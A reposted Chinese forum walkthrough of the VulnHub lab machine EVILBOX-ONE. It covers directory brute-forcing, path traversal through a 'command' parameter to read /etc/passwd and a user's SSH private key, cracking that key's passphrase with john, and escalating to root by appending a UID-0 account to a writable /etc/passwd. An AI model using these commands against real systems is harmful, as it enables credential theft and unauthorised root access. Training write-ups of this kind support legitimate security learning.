发表于 2024-5-28 21:03:33

『vulnhub系列』EVILBOX-ONE

『vulnhub系列』EVILBOX-ONE

下载所在:

https://www.vulnhub.com/entry/evilbox-one,736/信息搜集:

利用nmap探测内网存活主机,发现开启了22 和 80端口
nmap 192.168.0.*https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528160905322-461424296.png
访问80端口web服务,发现apache默认页面
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528160910018-35848764.png
利用dirsearch举行目录爆破
dirsearch -u "http://192.168.0.131"https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528160917399-2140272909.png
访问/robots.txt发现一句话,H4x0r 可能是用户名或密码
Hello H4x0r访问/secret/ 发现是空缺,我们来扫描这个目录,发现没有结果
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528160925128-1852156103.png
我们可以尝试换个工具和字典
gobuster dir -u "http://192.168.0.131/secret/" -w /usr/share/wordlists/dirb/big.txt -x .php

[*]-u 目标url
[*]-w wordlist字典
[*]-x 文件后缀
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528160933029-290392918.png
不知道为什么利用dirb用同样的字典和指定php爆破不出来
dirsearch -e php -w /usr/share/wordlists/dirb/big.txt -u "http://192.168.0.131/secret/"https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528160938392-613429848.png
末了发现evli.php,但是发现页面还是空的
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528160944064-1411004518.png
接下来利用工具ffuf举行爆破参数,末了得到参数为command
ffuf -u 'http://192.168.0.131/secret/evil.php?FUZZ=../../../../etc/passwd' -w "/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt" -fs 0

[*]-fs 0 过滤巨细为0
[*]FUZZ为字典爆破字段
[*]../../../../etc/passwd因为不确定是命令执行还是任意文件读取,可以用随意命令爆破,和足够多的../../../。。。。/etc/passwd来确定
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528160951200-846393772.png
漏洞利用:

因为刚刚那个,可能是密码,所以我们正好读取/etc/passwd
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528160958474-675753315.png
查看页面源代码,可以换行,发现用户名为mowree
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528161003311-188778272.png
利用mowree来登录H4x0r 为密码,发现登录失败,看来没这么简朴,继续利用任意文件读取
众所周知,我们除了利用密码登录ssh以外,还可以利用证书,而证书的私钥一样平常储存的位置
为/home/xxx/.ssh/id_rsa中xxx 为用户名,我们利用任意文件读取发现确实存在
command=../../../../home/mowree/.ssh/id_rsahttps://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528161009670-224183539.png
拷贝下来,利用ssh2john工具将id_rsa转化为john可以是识别的hash
ssh2john id_rsa > hash #将hash值输出到hash文件中再利用john来破解密码,得到密码unicorn
john hash --wordlist=rockyou.txt #使用wordlist(字典)破解,这里的字典是
#/usr/share/wordlists/里的rockyou需要解压一下https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528161020461-264190893.png
此时利用私钥登录,结果发现有告诫,而且需要输入mowree的密码
ssh -i id_rsa mowree@192.168.0.131https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528161026342-537586716.png
缘故原由是,id_rsa的默认权限为700,所以会出现告警。因此我们将id_rsa的权限修改为700
chmod 700 id_rsa此时登录,输入unicorn 即可登陆成功
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528161032493-800653696.png
提升权限:(passwd提权)

查看所有既有SUID权限的文件,没有发现异常
find / -perm -u=s -type f 2>/dev/nullhttps://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528161037838-894461202.png
利用命令查看用户可以以root权限运行的命令,发现没有这个命令
sudo -lhttps://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528161044766-1068383899.png
末了发现此用户对/etc/passwd具有写权限,那么这里就可以利用passwd提权
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528161051548-646721312.png
拿root在passwd中的条目依次来看
root:x:0:0:root:/root:/bin/bash

[*]root:用户名
[*]x:有密码,本来是放加密后的密码的,但后来都放入shadow中了,但也依旧支持此处是加密后的密码
[*]0:用户UID为0
[*]0:用户组GID为0
[*]root:用户备注信息
[*]/root:用户home目录
[*]/bin/bash:用户默认的bash
因此,如今我们在对passwd有写权限后,我们完全构造一个类似的root用户,我们个给passwd追加一个用户,那么如今首要就是生成一个加密后的密码(加盐值),这里利用pyhton来生成
python3 -c 'import crypt;print(crypt.crypt("123456","addsalt"))'

#生成加盐值的密码
adrla7IBSfTZQ如今我们来构造一个用户
test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash然后追加到passwd中:
echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd查看一下发现添加成功
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528161107520-692053554.png
我们此时切换为test用户看一下,得到root权限
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240528161112896-15813188.png
成果:

登录mowree用户后在目录下发现user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ得到root权限后,在其目录下发现root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 『vulnhub系列』EVILBOX-ONE